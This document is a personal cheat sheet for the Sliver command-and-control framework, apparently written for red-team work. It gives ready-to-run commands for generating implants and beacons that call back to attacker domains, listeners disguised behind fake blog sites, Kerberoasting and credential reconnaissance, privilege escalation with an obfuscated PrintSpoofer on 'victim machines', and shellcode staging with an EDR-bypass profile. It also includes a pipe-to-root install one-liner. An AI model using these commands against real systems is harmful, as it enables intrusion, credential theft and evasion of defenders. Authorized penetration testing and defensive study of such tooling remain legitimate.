Sliver

Sliver's a rad C2

Resources that help me make sense of Sliver

Install Sliver

Linux one-liner

curl https://sliver.sh/install|sudo bash

With dependencies (if not already installed):

sudo apt install mingw-w64

With single binary

cd ~/
wget https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux
chmod +x sliver-server_linux

Install certbot (optional - for if you want to integrate with LetsEncrypt)

sudo apt install certbot -y
sudo certbot certonly

# I like this method because I port-forward 80/443 to my internal host, then choose option 1 (temporary Web server) and then fill out the rest of the fields to generate my cert
#
# Copy the key files to the home folder to make them easier to access later:
#
# sudo cp /etc/letsencrypt/live/domain.com/fullchain.pem ~/
# sudo cp /etc/letsencrypt/live/domain.com/privkey.pem ~/
#
# Adjust permissions so your basic "kali" or whatever user can see these files:
# sudo chown sevminsec:sevminsec /home/sevminsec/privkey.pem /home/sevminsec/fullchain.pem
# sudo chmod 640 privkey.pem fullchain.pem 

Run Sliver

sudo ./sliver-server_linux

Install the armory

(At a sliver shell)

armory install all

Armory "must haves"

Certify

# Install it
armory install certify

# Basic run
certify -- find /vulnerable

Rubeus

# Install it
armory install rubeus

# Find Kerberoastable users
rubeus -- kerberoast /nowrap

Seatbelt

# Install it
armory install seatbelt

# Useful checks
seatbelt -- DotNet
seatbelt -- Antivirus
seatbelt -- WindowsDefender
seatbelt -- LocalUsers
seatbelt -- LogonSessions
seatbelt -- CredentialFiles
seatbelt -- ChromiumPresence
seatbelt -- KeePassPresence
seatbelt -- TokenPrivileges
seatbelt -- PowerShellHistory
seatbelt -- ProcessCreationEvents
seatbelt -- NetworkShares
seatbelt -- ScheduledTasks
seatbelt -- Services
seatbelt -- UAC

# Interesting files
seatbelt -- InterestingFiles
seatbelt -- InterestingProcesses

# Save output to file
seatbelt --save -- -group=all

Sharphound

# Install it
armory install sharp-hound-4

# Basic collection - will create a file called something like 20260311170832_filename.zip
sharp-hound-4 -s -t 300 -- -c all --zipfilename filename

IMPLANTS

Generate a general mtls implant

generate --mtls domain.dom:8888 --format shellcode --arch amd64 --skip-symbols --save splinter.bin --name ETPHONEHOME

Generate a general HTTPS implant

generate --http https://10.7.10.253:8090 --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME

Generate an HTTPS implant with a custom domain

generate --http yourdomain.ru --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME

Delete an implant

implants rm NAME-OF-IMPLANT

You might also have to delete disk-level remnants. For example if you previously made an implant called ETPHONEHOME and then try to make another one, Sliver might complain like this:

[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[!] rpc error: code = Internal desc = rename import dir: target exists: /root/.sliver/slivers/windows/amd64/etphonehome/src/runc/cgroup

In which case you can nuke from disk (at regular command prompt) with:

sudo rm -rf /root/.sliver/slivers/windows/amd64/etphonehome

Start a general listener

https --lhost 10.7.10.253 --lport 8090

Start a listener with a custom domain

https --domain example.com

Generate a fake Web site to go along with your HTTPS listener

First make a ~/www folder, and then:

websites add-content --website fake-blog --web-path / --content www/index.html

Note: the fake-blog name will be referenced below if you setup an HTTPS listener with a custom domain and specific fake content.

Starting an HTTPs listener with a custom domain WITH pre-generated LetsEncrypt cert AND static content on your fake site

https --domain yourdomain.net.ru.edu.lol --cert ./fullchain.pem --key ./privkey.pem --website fake-blog

Establishing sessions with victim machines

From the victim system, find a way to run your beacon.exe. It will "phone home" to Sliver C2. To "upgrade" to a higher-privilege shell, upload an obfuscated printspoofer.exe:

use xxx (the session that was spawned)
upload /home/youruser/notprintspoofer.exe c:\\users\\public\\nps.exe

Then run it:

execute c:\\users\\public\\nps.exe -c c:\\users\\public\\your-original-beacon.exe

Interacting with sessions

Run BloodHound

sharp-hound-4 -- 'c all' --outputdirectory 'c:\users\public'

Specify --outputdirectory because what I've found is by default it tries to write to c:\windows\system which will be problematic if you're not a full local admin. Plus I don't want to clutter that directory up with a bunch of garbage.

Find and download it:

ls *.zip
download 2025blahblah.zip

Kill all dead sessions (marked as [DEAD])

sessions -C

BEACONS

Generate one with custom domain

generate beacon --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name BEECONE

Check beacon status

beacons

Watch beacons continuously for check in

beacons watch

Adjust check-in time of the beacon

use xxx

# Reconfigure callback time to 200s with an 11s jitter
reconfigure -i 200s -j 11s

Check pending tasks

tasks

PROFILES

Under construction

Generate profile

profiles new beacon --http domain.com --format shellcode --disable-sgn --skip-symbols bee

Add fake blog

websites add-content --website fake-blog --web-path / --content www/index.html

Stand up domain with HTTPS

https --domain domain.com --cert ./fullchain.pem --key ./privkey.pem --website fake-blog

Stage a listener

stage-listener --url https://yourdomain.com:8080 --profile bee

Generate the profile

profiles generate bee

Setup a staged payload with shellcodepack

echo "https://domain.com:8080/name-doesnt-matter.woff" | shellcode_pack.exe -t HTTPS_STAGER -G preloads\yourshellcode.bin --bypass-profile .\bypass_profiles\edrbypass.json

Start/restart sliver

sudo systemctl start sliver

Sliver quick reference for system interaction

Find basic info about the session:

[localhost] sliver (etphonehome) > info

        Session ID: a07faa10-3584-4205-88f3-e1c1ad0ff400
              Name: etphonehome
          Hostname: dc-vil
              UUID: cb7bb9dd-833f-4521-9614-dab4560d794d
          Username: NINJA\localuser
               UID: S-1-5-21-11790880-2535113846-25489808-1000
               GID: S-1-5-21-11790880-2535113846-25489808-513
               PID: 2984
                OS: windows
           Version: Server 2016 build 17763 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: https://domain.domain
    Remote Address: 1.2.3.4:50737
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Wed Mar 11 22:04:17 UTC 2026 (8m31s ago)
      Last Checkin: Wed Mar 11 22:12:47 UTC 2026 (1s ago)

Logged on user:

sa-whoami
sa-netloggedon

Quick reference (for me to quickly get up and running with a custom domain with HTTPS listener and obfuscated payload)

# generate the thing
generate --http custom.domain --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME

# start listening
https --domain custom.domain

Last updated on 2026-03-22